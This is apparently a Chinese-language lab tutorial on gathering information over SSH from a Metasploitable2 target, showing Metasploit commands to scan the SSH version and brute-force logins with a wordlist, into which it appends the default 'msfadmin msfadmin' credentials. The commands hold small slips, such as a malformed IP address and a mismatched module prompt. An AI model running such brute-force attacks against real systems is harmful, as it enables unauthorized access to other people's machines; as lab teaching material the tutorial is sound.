目录
基于SSH协议收集信息 --Metasploitable2-linux
实验内网渗透环境
Metasploitable2-linux:靶机 192.168.234.8
kali-debian:攻击机 192.168.234.141
win7 虚拟机:靶机 192.168.234.158
在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!
基于SSH协议收集信息 --Metasploitable2-linux
- 利用auxiliary/scanner/ssh/ssh_version模块扫描ssh版本信息2.0
- 利用auxiliary/scanner/ssh/ssh_login模块暴力破解linux用户和密码信息
- 开启kali新窗口,手动加入linux用户和密码到字典 ---以便展示效果
- ssh_login模块中set创建字典文件对象(设置字典--暴力破解依赖于字典文件)
- run,发现成功登录linux,有攻击机的40193端口向靶机ssh协议的22端口是开放的 --进行暴力破解
暴力破解 ——不停发送数据和收到响应包,如果有有效的密码就可以进行登录
SSH(Secure Shell)是安全、加密的远程连接网络协议,用于通过加密和身份验证实现安全的远程登录和文件传输,使用户能够安全远程访问和管理远程计算机。端口号:22
疑问:设置手动加入密码进字典的目的是?不设置会怎么样
(1)查看 ssh 服务的版本信息
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options
msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.2324.8
msf6 auxiliary(scanner/ssh/ssh_version) > run
(2)对 SSH 暴力破解
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options
msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.234.8
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
——设置字典文件默认的字典文件是不满足实际需求的==》我们需使用更强大的字典文件
root@zwzj:~# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
——因为字典文件中不包含我们的用户密码信息我们把自己的密码信息手动加入进去以便展示效果新开一个终端窗口
msf6 auxiliary(scanner/ssh/ssh_login) > run —— 回到 MSF 终端执行